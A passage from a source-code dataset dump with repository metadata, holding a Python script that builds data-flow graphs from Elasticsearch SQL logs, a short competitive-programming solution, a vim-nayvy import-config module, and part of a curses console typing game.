] | 20 | 2017-07-04T05:32:19.000Z | 2021-10-20T22:40:33.000Z | sources/elasticsearch/logs2dataflow.py | macbre/data-flow-graph | 74ceeff51083c3f9d8bd00bdbf56615708942e42 | [
"MIT"
] | 15 | 2017-06-09T20:12:36.000Z | 2019-01-18T18:40:21.000Z | sources/elasticsearch/logs2dataflow.py | macbre/database-flow-graph | 74ceeff51083c3f9d8bd00bdbf56615708942e42 | [
"MIT"
] | 5 | 2018-10-19T06:48:48.000Z | 2021-08-19T08:12:29.000Z | #!/usr/bin/env python2
"""
This script demonstates how to transform SQL logs fetched from elasticsearch into graph showing how data flows between the code and the storage
"""
from __future__ import print_function
import collections
import time
import logging
import re
from datetime import datetime
from dateutil import tz
import sqlparse
from elasticsearch import Elasticsearch
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s %(name)-35s %(levelname)-8s %(message)s',
datefmt="%Y-%m-%d %H:%M:%S"
)
logger = logging.getLogger(__name__)
def format_timestamp(ts):
"""
Format the UTC timestamp for Elasticsearch
eg. 2014-07-09T08:37:18.000Z
@see https://docs.python.org/2/library/time.html#time.strftime
"""
tz_info = tz.tzutc()
return datetime.fromtimestamp(ts, tz=tz_info).strftime("%Y-%m-%dT%H:%M:%S.000Z")
# take SQL logs from elasticsearch
sql_logs = get_log_messages(query='@message: /SQL.*/', limit=None) # None - return ALL matching messages
logger.info('Generating metadata...')
meta = map(extract_metadata, sql_logs)
meta = filter(lambda item: item is not None, meta)
logger.info('Building dataflow entries for {} queries...'.format(len(meta)))
entries = map(build_flow_entry, meta)
logger.info('Building TSV file with nodes and edges from {} entries...'.format(len(entries)))
graph = unique(
lambda entry, cnt: 'QPS: {:.4f}'.format(1. * cnt / 86400), # calculate QPS
entries
)
logger.info('Printing out TSV file with {} edges...'.format(len(graph)))
print('# SQL log entries analyzed: {}'.format(len(meta)))
print("\n".join(set(graph)))
# prepare flow data for redis operations
logger.info("Building dataflow entries for redis pushes...")
pushes = map(
lambda entry: '{source}\t{edge}\t{target}'.format(
source='bots:{}'.format(entry.get('@source_host').split('.')[0]), edge='push', target='redis:products'),
get_log_messages(query='program: "elecena.bots" AND @message: "bot::send"',limit=None)
)
pops = map(
lambda entry: '{source}\t{edge}\t{target}'.format(
target='mq/request.php', edge='pop', source='redis:products'),
get_log_messages(query='program: "uportal.bots-worker" AND @message: "Message taken from the queue"',limit=None)
)
graph = unique(
lambda entry, cnt: '{:.1f} messages/hour'.format(1. * cnt / 24),
pops + pushes
)
print('# Redis log entries')
print("\n".join(set(graph)))
# prepare HTTP traffic stats for bots
logger.info("Building dataflow entries for bots HTTP traffic...")
hosts_buckets, bytes_transfered = get_log_aggregate(
query='program: "elecena.bots" AND @message: "bot::send_http_request" AND severity: "info"',
group_by='@source_host', stats_field='@context.stats.size_download'
)
graph = []
max_count = max(hosts_buckets.values())
bytes_per_req = 1. * bytes_transfered['sum'] / bytes_transfered['count']
for host, count in hosts_buckets.iteritems():
graph.append('{source}\t{edge}\t{target}\t{value:.4f}\t{metadata}'.format(
source='web:shops', edge='http fetch', target='bots:{}'.format(host), value=1.0 * count / max_count,
metadata='{reqs:.0f} requests/hour, {gibs:.2f} GiB/hour'.format(reqs=1. * count / 24, gibs=bytes_per_req * count / 1024 / 1024 / 1024 / 24)
))
print('# bots HTTP traffic')
print("\n".join(set(graph)))
# prepare flow data for s3 operations
logger.info("Building dataflow entries for s3 operations...")
s3_uploads = map(
lambda entry: '{source}\t{edge}\t{target}'.format(
source='ImageBot', edge='upload', target='s3:s.elecena.pl'),
get_log_messages(query='program: "nano.ImageBot" AND @message: "Image stored"',limit=None)
)
graph = unique(
lambda entry, cnt: '{:.1f} requests/hour'.format(1. * cnt / 24),
s3_uploads
)
print('# s3 operations')
print("\n".join(set(graph)))
| 28.330357 | 143 | 0.668768 | #!/usr/bin/env python2
"""
This script demonstates how to transform SQL logs fetched from elasticsearch into graph showing how data flows between the code and the storage
"""
from __future__ import print_function
import collections
import time
import logging
import re
from datetime import datetime
from dateutil import tz
import sqlparse
from elasticsearch import Elasticsearch
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s %(name)-35s %(levelname)-8s %(message)s',
datefmt="%Y-%m-%d %H:%M:%S"
)
logger = logging.getLogger(__name__)
def format_index_name(ts, prefix='syslog-ng_'):
    """Build a daily Elasticsearch index name, e.g. 'syslog-ng_2017-06-03'.

    The UTC date of the given UNIX timestamp is appended to *prefix*.
    """
    day = datetime.fromtimestamp(ts, tz=tz.tzutc()).strftime('%Y-%m-%d')
    return prefix + day
def es_get_timestamp_filer(since=None):
    """Build an Elasticsearch range filter selecting entries newer than *since*.

    Returns an empty dict (no filtering) when *since* is None.
    @see https://www.elastic.co/guide/en/elasticsearch/reference/2.3/query-dsl-range-query.html
    """
    if since is None:
        return {}
    return {"range": {"@timestamp": {"gt": since}}}
def format_timestamp(ts):
    """Render a UNIX timestamp as a UTC Elasticsearch timestamp string.

    Example output: 2014-07-09T08:37:18.000Z
    @see https://docs.python.org/2/library/time.html#time.strftime
    """
    as_utc = datetime.fromtimestamp(ts, tz=tz.tzutc())
    return as_utc.strftime("%Y-%m-%dT%H:%M:%S.000Z")
def get_log_messages(query, extra=None, now=None, limit=10000, batch=10000, return_raw=False):
    """Generator yielding log entries matching *query* from the last 24 hours.

    Entries are fetched from a local Elasticsearch in batches of *batch*,
    paging forward via the @timestamp of the last returned hit.  At most
    roughly *limit* entries are yielded (limit=None means unlimited).
    With return_raw=True the raw Elasticsearch response is yielded once
    instead of the individual hits (used for aggregations).
    """
    logger = logging.getLogger('get_log_messages')
    # connect to es
    es = Elasticsearch(host='127.0.0.1', port=59200, timeout=120)
    # take logs from the last day and today (last 24h)
    if now is None:
        now = int(time.time())
    indices = ','.join([
        format_index_name(now - 86400),
        format_index_name(now)
    ])
    # search
    body = {
        "query": {
            "query_string": {
                "query": query,
            }
        },
        "size": batch,
        "sort": { "@timestamp": { "order": "asc" }}
    }
    if extra is not None:
        body.update(extra)
    items = 0
    since = format_timestamp(now-86400)
    logger.info('Querying for "{}" since {} (limit set to {}, will query in batches of {} items)'.format(query, since, limit, batch))
    while limit is None or items <= limit:
        # only fetch entries newer than the last hit seen so far
        body["filter"] = es_get_timestamp_filer(since)
        res = es.search(index=indices, body=body)
        if return_raw is True:
            yield res
            return
        # logger.info('search: {}'.format(body))
        # logger.info('got {} results'.format(res['hits']['total']))
        cnt = len(res['hits']['hits'])
        # logger.info('Got {} results'.format(cnt))
        if cnt == 0:
            logger.info('No more results, returned {} results so far'.format(items))
            return
        # yield results one by one
        for hit in res['hits']['hits']:
            items += 1
            since = hit['_source']['@timestamp']
            yield hit['_source']
        logger.info('Next time will query for logs since {}'.format(since))
    logger.info('Limit of {} results reached, returned {} results so far'.format(limit, items))
def get_log_aggregate(query, group_by, stats_field):
    """Run a terms aggregation (bucketed by *group_by*) plus stats on *stats_field*.

    Returns (buckets, stats): buckets maps each group key to its document
    count; stats is the raw Elasticsearch stats aggregation result.
    """
    # @see https://www.elastic.co/guide/en/elasticsearch/reference/2.0/search-aggregations.html
    # @see https://www.elastic.co/guide/en/elasticsearch/reference/2.0/search-aggregations-metrics-stats-aggregation.html
    # @see https://www.elastic.co/guide/en/elasticsearch/reference/2.0/search-aggregations-bucket-terms-aggregation.html
    aggs = {
        "aggregations": {
            "group_by_agg": {
                "terms": {
                    "field": group_by
                },
            },
            "aggregations": {
                "stats" : { "field" : stats_field }
            }
        }
    }
    # limit=0/batch=0: only the aggregation part of the response is needed
    res = get_log_messages(query, extra=aggs, limit=0, batch=0, return_raw=True)
    res = list(res)[0]
    aggs = res['aggregations']
    # print(aggs)
    # build stats
    buckets = {}
    for agg in aggs['group_by_agg']['buckets']:
        buckets[agg['key']] = agg['doc_count']
    stats = aggs['aggregations']
    return buckets, stats
def get_query_metadata(query):
    """Extract (query_kind, (table,)) metadata from a raw SQL string.

    Returns e.g. ('SELECT', ('products',)), or None when no table name
    can be recognized.  An earlier sqlparse-based implementation that
    lived here was dead code (guarded by a constant ``None``) and has
    been removed; table names are recovered with regular expressions.
    """
    # first word of the query, e.g. SELECT / INSERT / UPDATE / DESCRIBE
    kind = query.split(' ')[0]
    # SELECT ... FROM <table> / INSERT INTO <table>
    matches = re.search(r'(FROM|INTO) (\w+)', query)
    if matches:
        return (kind, (matches.group(2),))
    # UPDATE <table> SET ...
    if 'UPDATE' in query:
        matches = re.search(r'(\w+) SET', query)
        if matches:
            return (kind, (matches.group(1),))
    # DESCRIBE <table>
    matches = re.search(r'DESCRIBE (\w+)', query)
    if matches:
        return (kind, (matches.group(1),))
    return None
def extract_metadata(message):
    """Turn one raw SQL log entry into a flow-metadata dict (or None).

    The returned dict has keys: db ('mysql' or 'sphinx'), kind (e.g.
    'SELECT'), table, method ('file_or_class::method') and web_request.
    NOTE(review): the '@fields'/'@context' layout is assumed from the log
    producer; verify against the logging side before changing this.
    """
    query = re.sub(r'^SQL ', '', message.get('@message'))
    meta = get_query_metadata(query)
    if meta is None:
        # logger.info('extract_metadata failed: {} - {}'.format(query[:120].encode('utf8'), meta));
        return None
    (kind, table) = meta
    table = table[0] # TODO: handle more tables
    # sphinx or mysql?
    db = message.get('@fields').get('database').get('name')
    # code method
    try:
        # legacy DB logger: derive "file.php::_kind" from the stack trace
        method = message.get('@context').get('exception').get('trace')[-2] # /opt/elecena/backend/mq/request.php:421
        method = '/'.join(method.split('/')[-2:]) # mq/request.php:53
        method = '{}::_{}'.format(method.split(':')[0], kind.lower()) # mq/request.php
    except AttributeError:
        # no trace available (a .get() returned None) -> use the explicit method field
        method = message.get('@context').get('method') # Elecena\Services\Sphinx::search
        if '::' not in method:
            method = method + '::_'
    return dict(
        db=db if db == 'sphinx' else 'mysql',
        kind=kind, # SELECT
        table=table, # products
        method=method,
        web_request='http_method' in message.get('@fields', {})
    )
def build_flow_entry(meta):
    """Render one TSV data-flow edge ("source<TAB>edge<TAB>target").

    Reads flow from the DB table to the code; writes (INSERT / UPDATE /
    DELETE) flow from the code to the DB table.
    """
    table_node = '{}:{}'.format(meta.get('db'), meta.get('table'))
    cls, edge = meta.get('method').split('::')
    is_write = meta.get('kind') in ('INSERT', 'UPDATE', 'DELETE')
    if is_write:
        source, target = cls, table_node
    else:
        source, target = table_node, cls
    return '\t'.join([source, edge, target])
def unique(fn, iterable):
    """Annotate each graph edge with a normalized weight and optional metadata.

    The weight is the edge's occurrence count divided by the count of the
    most frequent edge, floored at 0.0001 so rare edges stay visible.
    *fn*, when given, is called as fn(item, count) to produce a trailing
    metadata column.  Returns the annotated entries sorted; duplicates in
    *iterable* stay duplicated.
    """
    counts = collections.Counter(iterable)
    top = counts.most_common(1)[0][1]
    def annotate(entry):
        occurrences = counts[entry]
        weight = 1. * occurrences / top
        if weight < 0.0001:
            weight = 0.0001
        metadata = fn(entry, occurrences) if fn else ''
        return entry + "\t{:.4f}\t{}".format(weight, metadata).rstrip()
    return sorted(annotate(entry) for entry in iterable)
# take SQL logs from elasticsearch
sql_logs = get_log_messages(query='@message: /SQL.*/', limit=None) # None - return ALL matching messages
logger.info('Generating metadata...')
meta = map(extract_metadata, sql_logs)
meta = filter(lambda item: item is not None, meta)
logger.info('Building dataflow entries for {} queries...'.format(len(meta)))
entries = map(build_flow_entry, meta)
logger.info('Building TSV file with nodes and edges from {} entries...'.format(len(entries)))
graph = unique(
lambda entry, cnt: 'QPS: {:.4f}'.format(1. * cnt / 86400), # calculate QPS
entries
)
logger.info('Printing out TSV file with {} edges...'.format(len(graph)))
print('# SQL log entries analyzed: {}'.format(len(meta)))
print("\n".join(set(graph)))
# prepare flow data for redis operations
logger.info("Building dataflow entries for redis pushes...")
pushes = map(
lambda entry: '{source}\t{edge}\t{target}'.format(
source='bots:{}'.format(entry.get('@source_host').split('.')[0]), edge='push', target='redis:products'),
get_log_messages(query='program: "elecena.bots" AND @message: "bot::send"',limit=None)
)
pops = map(
lambda entry: '{source}\t{edge}\t{target}'.format(
target='mq/request.php', edge='pop', source='redis:products'),
get_log_messages(query='program: "uportal.bots-worker" AND @message: "Message taken from the queue"',limit=None)
)
graph = unique(
lambda entry, cnt: '{:.1f} messages/hour'.format(1. * cnt / 24),
pops + pushes
)
print('# Redis log entries')
print("\n".join(set(graph)))
# prepare HTTP traffic stats for bots
logger.info("Building dataflow entries for bots HTTP traffic...")
hosts_buckets, bytes_transfered = get_log_aggregate(
query='program: "elecena.bots" AND @message: "bot::send_http_request" AND severity: "info"',
group_by='@source_host', stats_field='@context.stats.size_download'
)
graph = []
max_count = max(hosts_buckets.values())
bytes_per_req = 1. * bytes_transfered['sum'] / bytes_transfered['count']
for host, count in hosts_buckets.iteritems():
graph.append('{source}\t{edge}\t{target}\t{value:.4f}\t{metadata}'.format(
source='web:shops', edge='http fetch', target='bots:{}'.format(host), value=1.0 * count / max_count,
metadata='{reqs:.0f} requests/hour, {gibs:.2f} GiB/hour'.format(reqs=1. * count / 24, gibs=bytes_per_req * count / 1024 / 1024 / 1024 / 24)
))
print('# bots HTTP traffic')
print("\n".join(set(graph)))
# prepare flow data for s3 operations
logger.info("Building dataflow entries for s3 operations...")
s3_uploads = map(
lambda entry: '{source}\t{edge}\t{target}'.format(
source='ImageBot', edge='upload', target='s3:s.elecena.pl'),
get_log_messages(query='program: "nano.ImageBot" AND @message: "Image stored"',limit=None)
)
graph = unique(
lambda entry, cnt: '{:.1f} requests/hour'.format(1. * cnt / 24),
s3_uploads
)
print('# s3 operations')
print("\n".join(set(graph)))
| 5,563 | 0 | 184 |
4505f7a728be18b57ebab98df1bcdb9e544919d8 | 148 | py | Python | abc032_a.py | Lockdef/kyopro-code | 2d943a87987af05122c556e173e5108a0c1c77c8 | [
"MIT"
] | null | null | null | abc032_a.py | Lockdef/kyopro-code | 2d943a87987af05122c556e173e5108a0c1c77c8 | [
"MIT"
] | null | null | null | abc032_a.py | Lockdef/kyopro-code | 2d943a87987af05122c556e173e5108a0c1c77c8 | [
"MIT"
] | null | null | null | a = int(input())
b = int(input())
n = int(input())
# Linear scan upward from n for the first value divisible by both a and b,
# i.e. the smallest common multiple of a and b that is >= n.
# int(10e9) (= 10**10) merely serves as a generous upper search bound.
for i in range(n, int(10e9)):
    if (i % a == 0 and i % b == 0):
        print(i)
        break
| 18.5 | 35 | 0.459459 | a = int(input())
b = int(input())
n = int(input())
for i in range(n, int(10e9)):
if (i % a == 0 and i % b == 0):
print(i)
break
| 0 | 0 | 0 |
8556a7209add99c3013666af795f0b26a16e21c9 | 3,451 | py | Python | python3/nayvy/importing/import_config.py | marekzidek/vim-nayvy | b3699f978e449aa669dd9bd4b13ae7c2d07d76c4 | [
"MIT"
] | 68 | 2020-03-17T07:36:42.000Z | 2022-02-18T13:21:22.000Z | python3/nayvy/importing/import_config.py | marekzidek/vim-nayvy | b3699f978e449aa669dd9bd4b13ae7c2d07d76c4 | [
"MIT"
] | 2 | 2020-03-17T06:52:44.000Z | 2021-01-03T06:45:13.000Z | python3/nayvy/importing/import_config.py | marekzidek/vim-nayvy | b3699f978e449aa669dd9bd4b13ae7c2d07d76c4 | [
"MIT"
] | 5 | 2020-03-17T07:42:23.000Z | 2022-01-02T23:02:36.000Z | import os
from typing import Any, Dict, List, Tuple, Optional, Generator
from os.path import dirname, expandvars
from pathlib import Path
from .fixer import ImportStatementMap
from .import_statement import SingleImport, ImportStatement
| 32.866667 | 83 | 0.572877 | import os
from typing import Any, Dict, List, Tuple, Optional, Generator
from os.path import dirname, expandvars
from pathlib import Path
from .fixer import ImportStatementMap
from .import_statement import SingleImport, ImportStatement
class ImportConfig(ImportStatementMap):
    """Mapping from importable names to their ``SingleImport`` statements.

    Built from a ``*.nayvy`` config file whose blank-line-separated blocks
    define groups of import statements; falls back to the default config
    bundled with the package when no user config exists.
    """

    @property
    def import_d(self) -> Dict[str, SingleImport]:
        # Read-only view of the underlying name -> SingleImport mapping.
        return self._import_d

    def __init__(self, import_d: Dict[str, SingleImport]) -> None:
        self._import_d = import_d
        return

    def __getitem__(self, name: str) -> Optional[SingleImport]:
        # Missing names yield None instead of raising KeyError.
        return self._import_d.get(name, None)

    def items(self) -> Generator[Tuple[str, SingleImport], Any, Any]:
        """Iterate over (name, SingleImport) pairs, dict-style."""
        for k, v in self._import_d.items():
            yield (k, v)

    @classmethod
    def init(
        cls,
        import_config_path: str = '',
    ) -> Optional['ImportConfig']:
        """Load the user's config if present, else the bundled default.

        Lookup order: the explicit ``import_config_path`` argument, then
        ``$XDG_CONFIG_HOME/nayvy/import_config.nayvy`` (XDG_CONFIG_HOME
        defaults to ``$HOME/.config``), then the package default.
        """
        if import_config_path:
            nayvy_import_config_path = expandvars(import_config_path)
        else:
            xdg_root = os.getenv(
                'XDG_CONFIG_HOME',
                '{}/.config'.format(
                    os.environ['HOME']
                )
            )
            nayvy_import_config_path = '{}/nayvy/import_config.nayvy'.format(
                xdg_root,
            )
        custom_config = cls._of_config_py(nayvy_import_config_path)
        if custom_config is not None:
            return custom_config
        return cls._of_default()

    @classmethod
    def _of_lines(cls, lines: List[str]) -> Optional['ImportConfig']:
        """ Construct nayvy import object from lines (content of nayvy config file)

        Blank lines split the file into blocks; each block's statements are
        parsed and every imported name is indexed with its block number.
        Returns None if any block fails to parse.
        """
        # Split the raw lines into blank-line-separated blocks.
        blocks: List[List[str]] = []
        tmp_block: List[str] = []
        for line in lines:
            if line.strip() == '':
                blocks.append(tmp_block)
                tmp_block = []
            else:
                tmp_block.append(line.strip())
        # Don't drop a trailing block that has no terminating blank line.
        if tmp_block:
            blocks.append(tmp_block)
        import_d: Dict[str, SingleImport] = {}
        for block_i, block in enumerate(blocks):
            import_statements = ImportStatement.of_lines(block)
            if import_statements is None:
                # Any unparsable block invalidates the whole config.
                return None
            for import_statement in import_statements:
                for import_as_part in import_statement.import_as_parts:
                    single_import = SingleImport(
                        import_as_part.name,
                        import_statement.get_single_statement(
                            import_as_part,
                        ),
                        block_i,
                    )
                    # Later definitions of the same name win.
                    import_d[single_import.name] = single_import
        return ImportConfig(import_d)

    @classmethod
    def _of_default(cls) -> Optional['ImportConfig']:
        """
        Construct ImportConfig object using default nayvy configuration
        prepared in a project.
        """
        # The default config ships next to this module.
        path = str(
            Path(dirname(__file__)) /
            'default_import_config.nayvy'
        )
        with open(path) as f:
            lines = f.readlines()
        return cls._of_lines(lines)

    @classmethod
    def _of_config_py(cls, config_path: str) -> Optional['ImportConfig']:
        """ Construct nayvy import config from a given path.

        Returns None when the file does not exist or fails to parse.
        """
        if not os.path.exists(config_path):
            return None
        with open(config_path) as f:
            lines = f.readlines()
        return cls._of_lines(lines)
| 998 | 2,192 | 23 |
371e2fd7e71a095bf5951efd01480406a7c08a39 | 12,876 | py | Python | typro/cli.py | hmdyt/typro | e8e6f88e72923c3dce4a8614119b82742060e732 | [
"MIT"
] | 3 | 2021-05-09T10:56:39.000Z | 2022-03-16T21:51:43.000Z | typro/cli.py | hmdyt/typro | e8e6f88e72923c3dce4a8614119b82742060e732 | [
"MIT"
] | 1 | 2021-04-27T17:37:47.000Z | 2021-04-27T17:38:02.000Z | typro/cli.py | hmdyt/typro | e8e6f88e72923c3dce4a8614119b82742060e732 | [
"MIT"
] | 1 | 2022-02-15T14:25:12.000Z | 2022-02-15T14:25:12.000Z | #!/usr/bin/env python3
import argparse
import collections
import curses
import os
import random
import sys
import time
import pkg_resources
from multiprocessing import Array, Event, Process, Value
import numpy as np
import pandas as pd
if __name__ == "__main__":
main()
| 35.373626 | 92 | 0.561432 | #!/usr/bin/env python3
import argparse
import collections
import curses
import os
import random
import sys
import time
import pkg_resources
from multiprocessing import Array, Event, Process, Value
import numpy as np
import pandas as pd
def main():
    """Command-line entry point for the typro console typing game.

    Depending on flags this either lists the bundled training files,
    prints the ranking/summary reports, or runs one typing session by
    spawning a timer process and a curses input process, then prints the
    session stats and appends a CSV row to the log file.
    """
    parser = argparse.ArgumentParser(description='Typing game on console')
    parser.add_argument('-t', '--time', default=60,
                        help='Practice time (sec.)', type=int)
    parser.add_argument('-p', '--path', default='None',
                        help='Path to training file')
    parser.add_argument('-f', '--file', default='None',
                        help='Training filename')
    parser.add_argument('-l', '--logfile', default='typro_results.csv',
                        help='Log filename')
    parser.add_argument('-m', '--logpath', default='None',
                        help='Path to log file')
    parser.add_argument('-u', '--user', default='user', help='User name')
    parser.add_argument('-q', '--quiet', action='store_false',
                        help='Run without log')
    parser.add_argument('-o', '--order', action='store_true',
                        help='Not shuffle the training data')
    parser.add_argument('-r', '--ranking', action='store_true',
                        help='Show ranking')
    parser.add_argument('-s', '--summary', action='store_true',
                        help='Show user summary')
    parser.add_argument('-d', '--date', default=7,
                        help='Date to collect data', type=int)
    parser.add_argument('-i', '--list', action='store_true',
                        help='Display lists of training file included')
    args = parser.parse_args()
    # Resolve the training phrases and the CSV log location up front.
    training_list, path, filename, logpathfile = make_trainings(args)
    if args.list:
        print('Predefined training file (e.g., typro -f cmd)')
        print(pkg_resources.resource_listdir('typro', 'data'))
        return 0
    timeout_msec = args.time * 1000
    delta_time_msec = 200
    if args.user == 'user':
        # Default user: first non-empty login-style environment variable
        # (stays None if none of them is set).
        for name in ('LOGNAME', 'USER', 'LNAME', 'USERNAME'):
            user = os.environ.get(name)
            if user:
                break
    else:
        user = args.user
    if args.ranking:
        show_ranking(logpathfile, args.date)
        return 0
    if args.summary:
        show_summary(logpathfile, user, args.date)
        return 0
    # Shared state between the timer process and the curses input process.
    start_event = Event()
    timeout_event = Event()
    time_msec = Value('i', 0)
    # Slots default to -1; only slots written with a mistake hold codes > 0.
    mistake_char_list_as_int = Array('i', [-1]*1000)
    n_correct = Value('i', 0)
    timer_process = Process(target=timer,
                            args=(start_event, timeout_event,
                                  timeout_msec, time_msec))
    timer_process.start()
    input_process = Process(target=load_input,
                            args=(start_event, timeout_event,
                                  timeout_msec, time_msec,
                                  delta_time_msec,
                                  mistake_char_list_as_int,
                                  n_correct, training_list))
    input_process.start()
    input_process.join()
    # Keep only slots that were actually written (char codes > 0).
    mistake_char_list = [chr(c) for c in mistake_char_list_as_int if c > 0]  # (unused below)
    mistake_char_list_as_int = [c for c in mistake_char_list_as_int if c > 0]
    if time_msec.value > 0:
        print('User : ' + user)
        print('Correct types : ' + str(n_correct.value))
        print('Speed : ' +
              '{:.1f} types/sec'.format(n_correct.value/time_msec.value*1000))
    # --quiet is store_false: logging is ON by default, -q disables it.
    if args.quiet and n_correct.value:
        if not os.path.isfile(logpathfile):
            # First run: write the CSV header; columns 33..126 are the
            # per-character (printable ASCII) mistype counters.
            with open(logpathfile, mode='a') as f:
                f.write('user,timestamp,time,correct,speed,file' +
                        "".join([','+str(i) for i
                                 in np.arange(33, 127).tolist()])
                        + '\n')
        with open(logpathfile, mode='a') as f:
            write_str = user + ',' + str(int(time.time()))\
                + ',' + str(time_msec.value/1000) + ','\
                + str(int(n_correct.value)) + ','\
                + str(n_correct.value/time_msec.value*1000.)\
                + ',' + filename
            # Histogram of mistyped characters over ASCII 33..126.
            mistake_array = np.zeros(94)
            for char_int in mistake_char_list_as_int:
                mistake_array[char_int-33] += 1
            write_str += "".join([','+str(int(n)) for n in mistake_array])
            write_str += '\n'
            f.write(write_str)
    return 0
def make_bar(window_y_size, timeout_msec, time_msec):
    """Render an ASCII progress bar plus an elapsed/total time label."""
    width = window_y_size - 17  # reserve columns for the time label
    filled = int(width * (time_msec.value / timeout_msec))
    remaining = int(width - filled)
    label = ' {:.1f}/{:.0f} sec.'.format(time_msec.value / 1000,
                                         timeout_msec / 1000)
    return '[{}{}]{}'.format('#' * filled, '_' * remaining, label)
def point_mistake(correct, char_list):
    """Build a marker line with '^' under each mistyped character.

    ``correct`` is the target string and ``char_list`` the characters
    typed so far; positions not typed yet stay blank.  The leading space
    offsets the markers to line up under the 'Your type : ' row drawn by
    load_input.
    """
    mistake_str = ' '
    for i in range(len(correct)):
        # Fix: the original also tested ``len(correct) <= i``, which can
        # never be true inside ``range(len(correct))`` -- dead condition
        # removed.  Untyped or matching positions get a blank, mismatches
        # get a caret.
        if len(char_list) <= i or correct[i] == char_list[i]:
            mistake_str += ' '
        else:
            mistake_str += '^'
    return mistake_str
def load_input(start_event, timeout_event, timeout_msec,
               time_msec, delta_time_msec,
               mistake_char_list_as_int, n_correct, training_list):
    """Curses UI process: show phrases, read keys, tally correct/mistyped.

    Waits for any key, then signals ``start_event`` so the timer process
    begins counting; loops redrawing the screen every ``delta_time_msec``
    ms until ``timeout_event`` is set (timeout, Esc, or all phrases done).
    Results are reported through the shared ``n_correct`` counter and the
    ``mistake_char_list_as_int`` array of expected-character codes.
    """
    # Standard curses setup: raw unbuffered input, no echo, hidden cursor.
    stdscr = curses.initscr()
    curses.noecho()
    curses.curs_set(0)
    curses.raw()
    curses.cbreak()
    stdscr.keypad(True)
    stdscr.timeout(-1)
    practice_type = training_list
    index_practice = 0
    char_list = []
    window_y_size = stdscr.getmaxyx()[1]
    number_of_mistake = 0
    mistake_char_list = []
    stdscr.clear()
    # Splash-screen ASCII art ("typro" logo).
    sp0 = " _ "
    sp1 = "| |_ _ _ _ __ _ __ ___ "
    sp2 = "| __| | | | '_ \| '__/ _ \ "
    sp3 = "| |_| |_| | |_) | | | (_) |"
    sp4 = " \__|\__, | .__/|_| \___/ "
    sp5 = " |___/|_| "
    stdscr.addstr(0, 0, sp0)
    stdscr.addstr(1, 0, sp1)
    stdscr.addstr(2, 0, sp2 + ' Press any keys to start')
    stdscr.addstr(3, 0, sp3 +
                  ' Training time {:.0f} sec.'.format(timeout_msec/1000))
    stdscr.addstr(4, 0, sp4)
    stdscr.addstr(5, 0, sp5)
    stdscr.refresh()
    # Block until the first keypress; Esc or 'q' aborts immediately.
    c = stdscr.getch()
    if c == 27 or c == 113: # escape key or q
        timeout_event.set()
    start_event.set()
    # From here on getch() times out so the bar keeps redrawing.
    stdscr.timeout(int(delta_time_msec))
    while not timeout_event.is_set():
        stdscr.clear()
        stdscr.addstr(0, 0, make_bar(window_y_size, timeout_msec, time_msec))
        stdscr.addstr(2, 0, 'Type This : %s' % "".join(practice_type[index_practice]))
        stdscr.addstr(3, 0, 'Your type : %s' % "".join(char_list) + '_')
        stdscr.addstr(4, 0, point_mistake(practice_type[index_practice], char_list))
        # stdscr.addstr(5, 0, str(n_correct.value))
        # stdscr.addstr(6, 0, ''.join(mistake_char_list))
        stdscr.refresh()
        # stdscr.noutrefresh()
        # curses.doupdate()
        c = stdscr.getch()
        if c != -1: # Find key type
            if c == 27: # escape key
                timeout_event.set()
            elif c == 263 or c == 127 or c == 8: # Backspace/Ctrl-H
                # Backspace only removes characters from a wrong prefix;
                # a correct prefix cannot be un-typed.
                if len(char_list) > 0:
                    if "".join(char_list) != practice_type[index_practice][:len(char_list)]:
                        del char_list[-1]
            elif c == 10: # Enter/Return
                # Advance to the next phrase only on an exact match;
                # finishing the last phrase ends the session.
                if "".join(char_list) == practice_type[index_practice]:
                    index_practice += 1
                    char_list = []
                    if index_practice >= len(practice_type):
                        timeout_event.set()
            elif c == curses.KEY_RIGHT or c == curses.KEY_LEFT:
                pass
            elif c == curses.KEY_UP or c == curses.KEY_DOWN:
                pass
            elif c == 21: # Ctrl-U
                # Clear the whole line, but again only if it is wrong.
                if "".join(char_list) != practice_type[index_practice][:len(char_list)]:
                    char_list = []
            else:
                char_list.append(chr(c))
                if len(practice_type[index_practice]) < len(char_list):
                    # Typed past the end of the phrase: ignore.
                    pass
                elif char_list[-1] == practice_type[index_practice][len(char_list)-1]:
                    # Count as correct only when the whole prefix matches.
                    if "".join(char_list) == practice_type[index_practice][:len(char_list)]:
                        n_correct.value += 1
                else:
                    # Record the character the user SHOULD have typed.
                    correct_char = practice_type[index_practice][len(char_list)-1]
                    mistake_char_list_as_int[number_of_mistake] = ord(correct_char)
                    number_of_mistake += 1
                    mistake_char_list.append(correct_char)
    # Restore the terminal to its normal state.
    stdscr.keypad(False)
    curses.curs_set(1)
    curses.nocbreak()
    curses.noecho()
    curses.endwin()
def timer(start_event, timeout_event, timeout_msec, time_msec):
    """Drive the shared elapsed-time counter for one practice session.

    Waits for ``start_event``, then updates ``time_msec`` (a shared
    millisecond counter) roughly once per millisecond until either
    ``timeout_msec`` elapses or ``timeout_event`` is set elsewhere;
    finally sets ``timeout_event`` so all processes stop together.
    """
    while not start_event.is_set():
        time.sleep(0.001)
    started_at = time.time()
    while True:
        if time_msec.value >= timeout_msec or timeout_event.is_set():
            break
        time.sleep(0.001)
        time_msec.value = int((time.time() - started_at) * 1000)
    timeout_event.set()
def get_df(log_filename=None, date=0):
    """Load the results CSV as a DataFrame limited to the last ``date`` days.

    Columns from index 6 onward hold ASCII codes 33..126 and are renamed
    to their characters; a 'mistype' total column is inserted at index 4.
    The index becomes the log timestamp converted to Asia/Tokyo time.
    ``date == 0`` means "no limit".
    """
    if log_filename is None:
        # Default location: $TYPRO_LOG_PATH (or $HOME) / typro_results.csv.
        # NOTE(review): assumes at least one of the env vars is set --
        # logpath[-1] would fail on None.  TODO confirm.
        logpath = os.getenv('TYPRO_LOG_PATH')
        if logpath is None:
            logpath = os.getenv('HOME')
        if logpath[-1] != '/':
            logpath += '/'
        log_filename = logpath + 'typro_results.csv'
    df_origin = pd.read_csv(log_filename)
    # Rename the per-character columns from ASCII codes to characters.
    char_int = df_origin.columns[6:]
    char = [chr(int(i)) for i in char_int]
    df = df_origin.rename(columns=dict(zip(char_int, char)))
    # Total number of mistypes per session row.
    df.insert(4, 'mistype', df_origin.iloc[:,6:].sum(axis=1), True)
    df.index = pd.DatetimeIndex(pd.to_datetime(df.timestamp, unit='s',utc=True),
                                name='date').tz_convert('Asia/Tokyo')
    # df = df[df['time'] > args.time]
    if date == 0:
        date = 10000 # huge value
